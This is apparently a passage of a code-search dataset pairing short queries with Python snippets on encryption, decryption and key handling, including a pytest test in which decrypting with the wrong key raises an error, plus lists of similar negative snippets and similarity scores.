"def decrypt(ciphertext, pad):\n\n return OR(ciphertext, pad)", "def verify_decrypt_key(self):\r\n\t\tpercent_english = Dict_Control(self.my_code).check_key()\r\n\t\t#If more than half the words are english, the key will pass. \r\n\t\tif percent_english > 50:\r\n\t\t\tself.right_key = False\r\n\t\t#If the key does not pass, the program will give you a warning and prompt you for another key. \r\n\t\telse: \r\n\t\t\tprint(f\"After decryption, it looks like only {percent_english}% of your words are english, you may have entered the wrong key?\")", "def test_set_private_key_setter(self) -> None:\n\n expected = self.pem_private_key.decode()\n\n encryptor = DataEncryption()\n encryptor.set_private_key(self.pem_private_key)\n\n # pylint: disable=protected-access\n actual = encryptor._loaded_private_key.private_bytes(\n serialization.Encoding.PEM,\n serialization.PrivateFormat.PKCS8,\n serialization.NoEncryption(),\n ).decode()\n\n self.assertEqual(expected, actual)", "def decrypt(self, key, msg, b64decode=True):\n if b64decode:\n msg = base64.b64decode(msg)\n iv = msg[:self.cipher.block_size]\n cipher = self.cipher.new(key, self.cipher.MODE_CBC, iv)\n\n padded = cipher.decrypt(msg[self.cipher.block_size:])\n l = ord(padded[-1:]) + 1\n plain = padded[:-l]\n return plain", "def key_down(key):\n vk = key\n # XXX exception if >= 256\n _key_down(vk)", "def rsa_decrypt(self, thing):\n return self.true_private_key.decrypt(\n thing,\n cryptography.hazmat.primitives.asymmetric.padding.OAEP(\n mgf=cryptography.hazmat.primitives.asymmetric.padding.MGF1(\n algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )" ]
[ "0.6593434", "0.6539305", "0.6523048", "0.65177274", "0.65156114", "0.6480838", "0.645648", "0.63991714", "0.63842076", "0.63480246", "0.634022", "0.6332533", "0.6332092", "0.631312", "0.62985706", "0.6246969", "0.6217749", "0.6211802", "0.6208556", "0.62013805", "0.6200206", "0.61917937", "0.61856425", "0.61591977", "0.61469704", "0.6130895", "0.61282086", "0.6117785", "0.6110495", "0.61065316", "0.6098602", "0.6087869", "0.6067118", "0.6059401", "0.60250145", "0.6014754", "0.6007378", "0.5992755", "0.59698784", "0.593554", "0.5933101", "0.58959746", "0.5889789", "0.58644414", "0.5859084", "0.5851036", "0.58326095", "0.5829949", "0.58200765", "0.5817937", "0.5804816", "0.57977164", "0.57821375", "0.5776229", "0.57745695", "0.5769266", "0.5764061", "0.5763407", "0.5756936", "0.5752143", "0.5747892", "0.5745901", "0.5739412", "0.5737317", "0.57232386", "0.57232386", "0.5721613", "0.5714002", "0.5709414", "0.5709279", "0.5707425", "0.5696489", "0.56954706", "0.5693621", "0.5678598", "0.5677957", "0.56733584", "0.56671864", "0.5665989", "0.56659573", "0.56637526", "0.56580436", "0.56489563", "0.5640701", "0.5630843", "0.5630795", "0.56302893", "0.56301093", "0.5620199", "0.5616181", "0.5605914", "0.56022054", "0.56010956", "0.55969805", "0.5595972", "0.559252", "0.5589714", "0.5585233", "0.55850416", "0.55739594" ]
0.69840544
0
It requires a 32-byte key.
def test_decrypt_key_invalid(self): encrypted = encrypt('message', key=b'0' * 32) with pytest.raises(EncryptionError): decrypt(encrypted, key=b'0' * 31)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, key: bytes):\n\n if len(key) != 32:\n raise ValueError('Key must be 32 bytes long')\n self.key = key", "def create_key ():", "def __init__(self, key):\n self.bs = 16\n self.key = hashlib.sha256(key.encode()).digest()", "def load_key():", "def test_long():\n key = 'A' * 242\n hashed_key = '%s[3705915182]' % ('A' * 229)\n full_key = 'prefix:1:%s' % hashed_key\n assert full_key == make_key(key, 'prefix', 1)", "def __init__(self, key: bytearray):\n self.__key = key\n self.__KSA(bytearray([i for i in range(256)]))", "def __init__(self,key):\n self.block_size = 32\n self.key = hashlib.sha256(key).digest()", "def key():", "def key(key):\n return key", "def load_key(self, type, keyid):\n pass", "def keyIndex(self, key):\n key ^= bsr(key, 33)\n key *= 0xff51afd7ed558ccdL\n key ^= bsr(key, 33)\n key *= 0xc4ceb9fe1a85ec53L\n key ^= bsr(key, 33)\n return key", "def __init__(self, key):\n self.key = key\n self.BLOCK_SIZE = 16", "def generate_random_key():\n return '%030x' % (random.randrange(256**15),)", "def key():\n pass", "def key():\n pass", "def _get_raw_key(self, key_id):", "def _GetKeyString(self):", "def _GetKeyString(self):", "def key_for_bucket(self, key):\n\n try:\n return int(key[0] // 16), int(key[1] // 16), int(key[2] // 16)\n except ValueError:\n return KeyError(\"Key %s isn't usable here!\" % repr(key))", "def key_for_bucket(self, key):\n\n try:\n return int(key[0] // 16), int(key[1] // 16)\n except ValueError:\n return KeyError(\"Key %s isn't usable here!\" % repr(key))", "def generate_key():\n return get_random_bytes(KEY_SIZE)", "def _newKey(self, key):\n pass", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def generate_key():\n\tkey = [ randint(0,255) for i in range(16) ]\n\treturn bytes( key )", "def _set_key(self, key):\n\n # select 56 bits from the 64-bit key\n key = self._permutate(self.__pc1, self._string_to_bitlist(key))\n self.L = key[:28]\n self.R = key[28:]\n for i in range(0, 16):\n for j in range(0, self.__left_rotations[i]):\n self.L.append(self.L[0])\n del self.L[0]\n self.R.append(self.R[0])\n del self.R[0]\n # select 48 bits from 56 bits\n self.Kn[i] = self._permutate(self.__pc2, self.L + self.R)", "def test_set_key_too_long(self):\n with RandomKeyTmpFile(128) as fname:\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", fname]\n self.check_error(StratisCliEngineError, command_line, _ERROR)", "def isValidKey(key):\n return True", "def key_id(cls, url: str):\r\n ...", "def load_key():\n return open(\"Secret.key\",\"rb\").read()", "def hashId(key, size):\n return sum([ord(c) for c in key]) % size", "def get_key_id(self):", "def hash_key(self, key):\r\n hashed_key = sum((ord(char) for char in key))\r\n return hashed_key % 20", "def generate_key(self)->bytes:\n return os.urandom(32)", "def __init__(self, key):\n self._block_size = AES.block_size\n self._key = hashlib.sha256(get_as_bytes(key)).digest()", "def load_key(self, key):\n self.key = key", "def private_key(self):", "def public_key(self):", "def generate_key():\n return unicode(hashlib.sha224(str(random.getrandbits(128))).hexdigest())", "def _key_hash(self, key):\n\n split_key = key.strip(' ').split(' ')[1]\n return int(split_key)", "def safe_key(key, key_prefix, version):\r\n\r\n # Clean for whitespace and control characters, which\r\n # cause memcache to raise an exception\r\n key = cleaned_string(key)\r\n key_prefix = cleaned_string(key_prefix)\r\n version = cleaned_string(version)\r\n\r\n # 
Attempt to combine the prefix, version, and key\r\n combined = \":\".join([key_prefix, version, key])\r\n\r\n # If the total length is too long for memcache, hash it\r\n if len(combined) > 250:\r\n combined = fasthash(combined)\r\n\r\n # Return the result\r\n return combined", "def _check_key(self, key):\n raise NotImplementedError", "def test_getKey_nokey(self):\n filename = os.path.join(os.getcwd(), 'sekrit')\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! type=%r\" % type(key))", "def RequireScriptHash(key):\n Require(len(key) == 20)\n return True", "def hex_key(uid: Text, mp: Text) -> Text:\n\n key = sha256(mp.encode('utf-8') + admin_pass.encode('utf-8')).hexdigest()\n return sha256(uid.lower().encode('utf-8') + key.encode('utf-8')).hexdigest()[:40]", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def gen_key():\n key = os.urandom(32) # 256 bit\n return base64.b64encode(key).rstrip('=') # strip off padding", "def key_size(self) -> int:\n pass", "def key_size(self) -> int:\n pass", "def test_short():\n key = 'A' * 241\n full_key = 'prefix:1:%s' % key\n assert full_key == make_key(key, 'prefix', 1)", "def from_key(self, public_id, key):\n otp = self.get_otp(key)\n from_key = modhex_encode(public_id.encode('hex')) + modhex_encode(otp.encode('hex'))\n return from_key", "def __init__(self, key):\n self.key = key", "def MakeKey(self, string, string_1, string_2):\n ...", "def prepare_key(self, key):\n return smart_str(key)", "def proper_key(key, klen):\n ckey = \"\"\n if len(key) < klen:\n lmulti = math.floor(klen/len(key))\n lmod = klen % len(key)\n ckey = key * int(lmulti) + key[:lmod]\n elif len(key) > klen:\n ckey = key[:klen]\n else:\n ckey = key\n return ckey", "def _safe_key(self, key):\n if isinstance(key, str):\n key = key.encode('UTF-8')\n return key", "def generate_random_key(self):\n self.key = ''.join(choice(ascii_letters + digits) for i in range(300))", "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def __init__(self, aKey):\n self.key = aKey\n\n # CRC can be used to validate a key (very roughly)\n # if you store the CRC from a previous keyword\n # and then compare with a newly generated one and\n # they are the same then chances are the keyword\n # is correct - only a single byte so not that reliable\n self.crc = 0 \n for x in self.key:\n intX = ord(x)\n self.crc = self.crc ^ intX", "def test_get_key_digest_with_integer_key(self):\n\n digest = self.as_connection.get_key_digest(\"test\", \"demo\", 1)\n\n assert isinstance(digest, bytearray)", "def _key_array(key):\n key = map(ord, key)[:16]\n initial = map(ord, \"6170383452343567\")\n while len(key) < len(initial):\n key.append(initial[len(key)])\n return key", "def load_key(self):\n\t return open(\"key.key\", \"rb\").read()", "def entry(from_code, key):\n # turn code to hexadecimal\n from_code = DC.uniToHex(from_code)\n\n en = DESEncode()\n string_len = len(from_code)\n\n if string_len < 1:\n print 'error input'\n return False\n key_code = en.encode(from_code, key, string_len)\n return key_code", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def 
create_key(message, key):\n if len(key) > len(message):\n return key[0:len(message)]\n new_key = key * int(len(message)/len(key))\n new_key += key[0:len(message) - len(new_key)]\n return new_key", "def __generate_key(length):\n if length % 2 != 0:\n raise ValueError(\"'length' must be a multiple of 2\")\n length_bytes = int(length / 2) # length of key in bytes\n key_bytes = os.urandom(length_bytes)\n return binascii.hexlify(key_bytes).decode()", "def keyExp(key):\r\n def sub2Nib(b):\r\n \"\"\"Swap each nibble and substitute it using sBox\"\"\"\r\n return sBox[b >> 4] + (sBox[b & 0x0f] << 4)\r\n \r\n Rcon1, Rcon2 = 0b10000000, 0b00110000\r\n w[0] = (key & 0xff00) >> 8\r\n w[1] = key & 0x00ff\r\n w[2] = w[0] ^ Rcon1 ^ sub2Nib(w[1])\r\n w[3] = w[2] ^ w[1]\r\n w[4] = w[2] ^ Rcon2 ^ sub2Nib(w[3])\r\n w[5] = w[4] ^ w[3]", "def test_create_key():\n\n assert symmetric.create_key() != \"\"", "def generate_aes_key ( ) :\n import hashlib\n sr = Crypto.Random.random.StrongRandom( )\n key_bits = sr.getrandbits( 256 )\n sha_key = hashlib.sha256( str( key_bits ) ).digest( )\n return sha_key", "def test_generate_key(self): \n k = Key().generate()\n self.assertRegex(k, \"[a-zA-Z0-9+\\/]+={0,2}\")", "def test_encrypt_key_invalid(self):\n with pytest.raises(EncryptionError):\n encrypt('message', key=b'0' * 31)", "def __init__(self, key):\n if len(key) > KEY_SIZE:\n raise ParameterError(\"Key must be <%d bytes\" % (KEY_SIZE))\n\n self.key = key.ljust(KEY_SIZE, b\"\\xff\")\n self.encryptIV = b\"\\xff\" * BLOCK_SIZE\n self.decryptIV = b\"\\xff\" * BLOCK_SIZE\n self.remainingData = b\"\"\n self.oldDecrypt = b\"\"", "def load_key():\n return open(\"secret.key\", \"rb\").read()", "def get_random_key(self, size=16):\n key = ''.join([random.choice(Characters.get_characters()) for i in range(size)])\n return self.__strengthen_key(key)", "def _encode_key(self, key: str) -> str:\n return key", "def test_getKey_keyexists(self):\n filename = self.mktemp()\n with open(filename, 'wb') as fh:\n fh.write(SEKRIT_KEY)\n fh.flush()\n\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! 
type=%r\" % type(key))\n self.assertEqual(SEKRIT_KEY, key,\n \"\"\"The example key and the one read from file differ!\n key (in hex): %s\n SEKRIT_KEY (in hex): %s\"\"\"\n % (key.encode('hex'), SEKRIT_KEY.encode('hex')))", "def __init__(self, key=None):\n self.key = key", "def _filesystem_safe_encode(key):\n return hashlib.sha256(key.encode()).hexdigest()", "def hash_key(self):", "def generate_key():\r\n\t\treturn ''.join(random.SystemRandom().choice(string.ascii_lowercase) for _ in range(123))", "def load(self, key: str) -> str:\n pass", "def unique_key(size):\n # Charset to create keys from\n charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'\n l = len(charset)-1\n bad_key = 1\n\n # Get a new seed\n ran.seed()\n\n while(bad_key > 0):\n # Create key\n key = list()\n for i in range(size):\n r = ran.randint(0, l)\n key.append(charset[r])\n key = \"\".join(key)\n\n # Check key\n bad_key = check_key(key)\n\n return(key)", "def JAVA_NATIVE(key):\n h = 0\n l = len(key)\n for (idx,c) in enumerate(key):\n h += ord(c)*31**(l-(idx+1))\n return _signed_int32(h)", "def test_set_key():\n\n assert symmetric.set_key(\"test\") == \"test\"", "def key_upload(self, key=None):\n raise NotImplementedError", "def corrupt(self, key):\n rand_bytes = random.getrandbits(8)\n byte_str = bytes([rand_bytes])\n self.client[key] = byte_str\n print('Corrupted %s in redis' % key)", "def genKey(length=32):\r\n return os.urandom(length)", "def key_handler(args):\n key = create_key(args.key_type, args.key_size, args.key_out)\n\n if not args.key_out:\n print(print_key(key))\n\n return key", "def keyGen(key):\n def leftShift(keyBitList):\n \"\"\"Perform a circular left shift on the first and second five bits\"\"\"\n shiftedKey = [None] * KeyLength\n shiftedKey[0:9] = keyBitList[1:10]\n shiftedKey[4] = keyBitList[0]\n shiftedKey[9] = keyBitList[5]\n return shiftedKey\n\n # Converts input key (integer) into a list of binary digits\n keyList = [(key & 1 << i) >> i for i in reversed(range(KeyLength))]\n permKeyList = [None] * KeyLength\n for index, elem in enumerate(P10table):\n permKeyList[index] = keyList[elem - 1]\n shiftedOnceKey = leftShift(permKeyList)\n shiftedTwiceKey = leftShift(leftShift(shiftedOnceKey))\n subKey1 = subKey2 = 0\n for index, elem in enumerate(P8table):\n subKey1 += (128 >> index) * shiftedOnceKey[elem - 1]\n subKey2 += (128 >> index) * shiftedTwiceKey[elem - 1]\n return (subKey1, subKey2)", "def game_key(proto_obj):\n return game_key_full(proto_obj.id_str)", "def test_getKey_tmpfile(self):\n filename = self.mktemp()\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! 
type=%r\" % type(key))", "def fullkey(self, key):\n if len(self.basekey) > 0:\n return \"{}:{}\".format(self.basekey, key)\n else:\n return key", "def testKeyInfoTooShort(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='x', keyInfo='xx')", "def _hash(self, key):\n if self.function == 'fnv':\n h = 2166136261\n for i in range(len(key)):\n h = (h * 16777619) ^ ord(key[i])\n return h\n elif self.function == 'add':\n h = 0\n for i in range(len(key)):\n h += ord(key[i])\n return h", "def serialize_key(key: str) -> bytes:\n return key.encode(\"utf-8\")", "def gen_api_key():\r\n m = hashlib.sha256()\r\n m.update(get_random_word(12))\r\n return unicode(m.hexdigest()[:12])", "def parse_key(self, key):\r\n if not key:\r\n self.aes = None # empty key == no encryption\r\n return self.parse_string(self.tmp) # must return size (see the next return)\r\n key.decode() # test availability\r\n size = len(key)\r\n for padding in (16, 24, 32): # fixed key size\r\n if size <= padding:\r\n break\r\n key += chr(0) * (padding - size)\r\n self.aes = AES.new(key)\r\n return self.parse_string(self.tmp) # if key changes you must update string\r", "def randkey():\n return binascii.b2a_hex(os.urandom(15))", "def test_generate_api_key():\n\n key = auth.generate_api_key() # returns a NamedTuple with api_key and hashed_key\n hashed_api_key = sha256(key.api_key.encode('utf-8')).hexdigest()\n assert hashed_api_key == key.hashed_key", "def testKeyInfoTooLong(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey',\n keyInfo='xxxxx')", "def h_python(key, N):\n return hash(key) % N", "def __LFSR(self, key: bytearray) -> int:\n x = key.pop()\n out = x ^ key[254] ^ key[244]\n key.append(out)\n return out" ]
[ "0.7998701", "0.7112175", "0.70670855", "0.70627075", "0.7016668", "0.6956229", "0.6922364", "0.69079906", "0.683496", "0.6793663", "0.6758785", "0.6736807", "0.6699168", "0.66464436", "0.66464436", "0.6582861", "0.6575875", "0.6575875", "0.6530098", "0.6464395", "0.64615387", "0.6431281", "0.6409816", "0.64072996", "0.6380205", "0.63691837", "0.6364988", "0.63445956", "0.6333884", "0.6314983", "0.62884396", "0.6287946", "0.62855154", "0.6284593", "0.6283395", "0.62778026", "0.6249145", "0.6238161", "0.6218663", "0.62180775", "0.621264", "0.6209929", "0.62098855", "0.6201968", "0.61832094", "0.6165452", "0.6164135", "0.6164135", "0.6163434", "0.61451197", "0.6144095", "0.61438715", "0.6131953", "0.6131367", "0.6125875", "0.61194044", "0.611741", "0.6115215", "0.60866535", "0.60843086", "0.6081425", "0.60729414", "0.6072409", "0.60693586", "0.6058629", "0.60384303", "0.60341585", "0.6024876", "0.60222065", "0.6010098", "0.6007422", "0.6002475", "0.5989427", "0.5988416", "0.5987336", "0.59869623", "0.5986533", "0.5982801", "0.597676", "0.5976266", "0.5974522", "0.5972237", "0.5956679", "0.5956074", "0.5949675", "0.59461755", "0.59422", "0.59389496", "0.59353095", "0.59326047", "0.5931608", "0.5909314", "0.59028125", "0.5902636", "0.58889735", "0.58841246", "0.58772516", "0.58753026", "0.58738846", "0.58708405", "0.5863783" ]
0.0
-1
It raises an error when an incorrect key is provided.
def test_decrypt_key_incorrect(self):
    right_key = b'0' * 32
    wrong_key = b'1' * 32
    encrypted = encrypt('message', key=right_key)
    with pytest.raises(EncryptionError):
        decrypt(encrypted, key=wrong_key)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _check_key(self, key):\n raise NotImplementedError", "def test_handle_key_error():\n\n @handle_key_error\n def get_item(key):\n data = {\"A\": 1, \"B\": 2}\n return data[key]\n\n value = get_item(\"A\")\n assert value == 1\n\n with pytest.raises(InvalidParameter) as exc:\n get_item(\"C\")\n\n assert \"C\" in str(exc.value)", "def test_getObjectByKey_raises_KeyError(self):\n try:\n self.tile_bucket.getObjectByKey('foo_key')\n except KeyError:\n return\n assert(False)", "def test_keyerror(self):\n try:\n self.db['foo']\n except KeyError, e:\n assert \"no key 'foo' in database <SequenceFileDB\" in str(e), str(e)", "def validate_key_throw(*args):\n validation_result = validate_key(*args)\n if not validation_result:\n raise ValueError(str(validation_result))\n return validation_result", "def test_map_missing_key_encountered():\n with pytest.raises(KeyError):\n Map().read_key(10, b\"\")", "def test_neg_exists_key_invalid_data(self, key, ex_code, ex_msg):\n with pytest.raises(e.ParamError):\n key, _ = self.as_connection.exists(key)", "def test_missing_entry_raises_KeyError(self):\n with self.assertRaises(KeyError):\n self.phonebook.lookup(\"missing\")", "def __missing__(self, key):\n global MISSING\n MISSING = key # For debugging - save name of missing key\n return INVALID", "def test_get_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"]", "def test_wrong_key(self):\n with pytest.raises(FinderInsideProException) as ex:\n FinderInsidePro(\"\")\n assert FinderInsideProException.EXCEPTION_TEXT_KEY_NOT_SET in str(ex)\n assert ex.value.extype == FinderInsideProException.TYPE_KEY_IS_WRONG\n\n with pytest.raises(FinderInsideProException) as ex:\n FinderInsidePro('aaa')\n assert FinderInsideProException.EXCEPTION_TEXT_WRONG_KEY in str(ex)\n assert ex.value.extype == FinderInsideProException.TYPE_KEY_IS_WRONG", "def _check_key(key): # type: (str) -> None\n if not key:\n raise ValueError('Key must not be empty.')\n if '.' 
in key:\n raise ValueError('Key must not contain dots.')", "def keyError():\n d = {}\n d['cat']", "def test_throws_item_missing_key(self):\n with pytest.raises(marshmallow.ValidationError):\n Item.Schema().loads(json.dumps(item_missing_key))", "def __missing__(self, key):\n raise KeyNotInContextError(f\"{key} not found in the pypyr context.\")", "def _KeyMissing(side):\n return 'Key missing from %s' % side", "def __assert_option(self, key):\n\n if not self.has_option(key):\n raise KeyError(\"No such option.\")", "def test_dweet_for_with_an_invalid_key(self):\n try:\n dweepy.dweet_for(self.my_thing_id, test_data, key='badkey')\n except dweepy.DweepyError as e:\n self.assertEqual(e.args[0], 'the key you provided doesn\\'t work with this thing')\n else:\n self.fail(\"shouldn't ever get called\")", "def testKeyInfoTooShort(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='x', keyInfo='xx')", "def test_set_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"] = \"value\"", "def test_get_latest_dweet_for_with_an_invalid_key(self):\n try:\n dweepy.get_latest_dweet_for(self.my_thing_id, key='badkey')\n except dweepy.DweepyError as e:\n self.assertEqual(e.args[0], 'the key you provided doesn\\'t work with this thing')\n else:\n self.fail(\"shouldn't ever get called\")", "def test_get_single_different(single_bucket): # pylint: disable=redefined-outer-name\n with pytest.raises(KeyError):\n single_bucket.get(\"key 2\")", "def test_config_key_error():\n c = core.Config()\n\n with pytest.raises(KeyError):\n c['doesNotExist']", "def test_invalid_key(self):\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('221b=\"starts with number\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('_=\"not assignable\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('o-o=\"invalid character\"')\n assert 'Invalid key' in str(err.value)", "def get_or_raise(self, key: str, error_message: str = None) -> str:\n v = self.get_or_default(key, None)\n if v is None:\n if error_message is None:\n print(\"Error, '\" + key + \"' is required.\")\n else:\n print(error_message)\n raise CLIMissingKeyError(error_message)\n\n else:\n return v", "def __missing__(self, key):\n return key", "def test_incorrect_prediction_key(self):\n self._config['Prediction key'] = 'wrong_key'\n with self.assertRaisesRegex(ValueError, 'Invalid prediction key'):\n self._gen.generate(\n example=self._example,\n model=self._model,\n dataset=self._dataset,\n config=self._config)", "def test_get_empty(empty_bucket): # pylint: disable=redefined-outer-name\n with pytest.raises(KeyError):\n empty_bucket.get(\"key 1\")", "def test_missingKey(self):\n self.assertIsNone(self.users.key(\"mystery domain\", \"mystery user\"))", "def test_get_invalid_key(self):\n pairs = {'library': '~/home/documents/dms',\n 'key': 'value',\n }\n exceptionKeys = ['Hello', 'spam']\n try:\n tempconfig = tempfile.NamedTemporaryFile(\n suffix=\".yaml\", delete=False)\n tempconfig.write('ham: eggs'.encode('UTF-8'))\n tempconfig.close()\n config = easydms.config.Config(tempconfig.name)\n\n for key, value in pairs.items():\n self.assertEqual(config.getKey(key, value), value)\n\n for key in exceptionKeys:\n with self.assertRaises(easydms.config.ErrorConfigKeyNotFound):\n config.getRequiredKey(key)\n finally:\n os.remove(tempconfig.name)", "def test_keys_failure(self):\n 
storage = Storage()\n storage._keys_dict = {'1': 'one',\n 'abc': '1'}\n self.assertRaises(StoragePatternError, storage.keys, 'ab[cd')", "def validate_key(key):\r\n try:\r\n secret.Secret(key)\r\n except secret.Secret.InvalidSecret as e:\r\n raise KeyIsInvalid(e.message)", "def avoid_keyerror(dictionary, key):\n\t\"*** YOUR CODE HERE ***\"\n\ttry:\n\t\tvalue = dictionary[key]\n\texcept KeyError:\n\t\tprint('Avoid Exception')\n\t\tdictionary[key] = value = 'no value'\n\tfinally:\n\t\treturn value", "def test_set_key_filename_missing(self):\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", \"/bogus\"]\n self.check_error(StratisCliKeyfileNotFoundError, command_line, _ERROR)", "def test_invalid_keys(self):\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"this has spaces\", 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"key with spaces did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"\\x10control\\x02characters\\x11\", 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"key with control characters did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"a\" * (SERVER_MAX_KEY_LENGTH + 1), 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"long key did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(u\"unicode\\u4f1a\", 1)\n\t\texcept TypeError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"unicode key did not raise ValueError\")", "def test_key_none(self):\n try:\n AlphaVantage()\n self.fail(msg='A None api key must raise an error')\n except ValueError:\n self.assertTrue(True)", "def test_key_none(self):\n try:\n AlphaVantage()\n self.fail(msg='A None api key must raise an error')\n except ValueError:\n self.assertTrue(True)", "def validate_key(self, key: keyType) -> bool:\n if isinstance(key, (dict,bool)):\n raise Exception\n if key is None:\n raise Exception\n # Numerical key object has no len(),\n # so explicitly specify which types are not allowed to use empty value as keys\n if isinstance(key, (str, tuple, set, list)) and (len(key) == 0):\n raise Exception\n return True", "def testBadKeyToToken(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey')", "def __check_key_validity(self, key):\n if not isinstance(key, tuple):\n raise TypeError(\"key must be a tuple\")\n if len(key) != 2:\n raise ValueError(\"key must be of length two\")\n if not (isinstance(key[0], int) and isinstance(key[1], int)):\n raise TypeError(\"elements of key must be integers\")\n if not ((0 <= key[0] < self.m) and (0 <= key[1] < self.n)):\n raise exc.OutOfBoundsError(\"key is out of bounds\")", "def testKeyInfoTooLong(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey',\n keyInfo='xxxxx')", "def isValidKey(key):\n return True", "def test_throws_base_price_missing_key(self):\n with pytest.raises(marshmallow.ValidationError):\n BasePrice.Schema().loads(json.dumps(base_price_missing_key))", "def test_getitem_error(self):\n with self.assertRaises(KeyError):\n self.tester['Not_a_Sample']", "def test_getitem_error(self):\n with self.assertRaises(KeyError):\n self.tester['Not_a_Sample']", "def provoke_and_handle_KeyError():\n test_dict = {}\n try:\n print(test_dict['to life'])\n except KeyError as ke:\n print(f\"Sorry! 
The key '{ke}' does not exist in test_dict!\")", "def test_empty_key_raises_error(empty_viewset):\n viewset = empty_viewset\n system1 = viewset.model.add_software_system(name=\"sys1\")\n\n with pytest.raises(ValueError, match=\"A key must be specified\"):\n viewset.create_container_view(\n key=\"\", description=\"container\", software_system=system1\n )", "def validate_instruction_keys(instruction: TransactionInstruction, expected: int) -> None:\n if len(instruction.keys) < expected:\n raise ValueError(f\"invalid instruction: found {len(instruction.keys)} keys, expected at least {expected}\")", "def test_toomanykeys(self):\n self.assertRaises(recordparser.KeyListMismatchError,\n recordparser.getfields, \"1234567890\", \"10s\", (\"key1\", \"key2\"))", "def handle_key(self, key):\n pass", "def testBadKeys(self):\n # Ignore access to protected members\n # pylint: disable=W0212\n self.assertRaises(DOLAPI._DOLAPIError,\n self.badauth.table,\n self.dataset,\n self.table)", "def test_no_key_raises_error(empty_viewset):\n viewset = empty_viewset\n system1 = viewset.model.add_software_system(name=\"sys1\")\n\n with pytest.raises(ValueError, match=\"A key must be specified\"):\n viewset.create_container_view(description=\"container\", software_system=system1)", "def _invalid_transport_key_id():\n pecan.abort(404, u._('Not Found. Provided transport key id is invalid.'))", "def assert_key_exists(self, key, caller):\n assert key, (\"key parameter must be specified.\")\n if key not in self:\n raise KeyNotInContextError(\n f\"context['{key}'] doesn't exist. It must exist for {caller}.\")", "def keyIsValid(key):\n\n isValid = 1\n \n try:\n temp = getParam(key)\n\n except ValueError:\n isValid = 0\n warning(\" WARNING: %s not set\" % (key))\n\n return isValid", "def mock_from_string(*args, **kwargs):\n raise InvalidKeyError('foo', 'bar')", "def test_PerfectModel_verify_metric_keyerrors(\n perfectModelEnsemble_initialized_control, metric\n):\n with pytest.raises(KeyError) as excinfo:\n perfectModelEnsemble_initialized_control.verify(\n comparison=\"e2c\",\n metric=metric,\n dim=[],\n )\n assert \"Specify metric from\" in str(excinfo.value)", "def testMissingKeys(self):\n self.assertRaises(ValueError,\n self.unauth.table,\n self.dataset,\n self.table)", "def test_nokey(testchannel, methodname):\n key = 42\n\n with pytest.raises(KeyError) as err:\n getattr(testchannel, methodname)(key)\n\n assert err.value.args == (key, )", "def test_get_key_digest_with_no_parameter(self):\n with pytest.raises(TypeError) as typeError:\n self.as_connection.get_key_digest()\n\n assert \"argument 'ns' (pos 1)\" in str(\n typeError.value)", "def _GetCompleteKeyOrError(arg):\n if isinstance(arg, Key):\n key = arg\n elif isinstance(arg, basestring):\n key = Key(arg)\n elif isinstance(arg, Entity):\n key = arg.key()\n elif not isinstance(arg, Key):\n raise datastore_errors.BadArgumentError(\n 'Expects argument to be an Entity or Key; received %s (a %s).' %\n (arg, typename(arg)))\n assert isinstance(key, Key)\n\n if not key.has_id_or_name():\n raise datastore_errors.BadKeyError('Key %r is not complete.' 
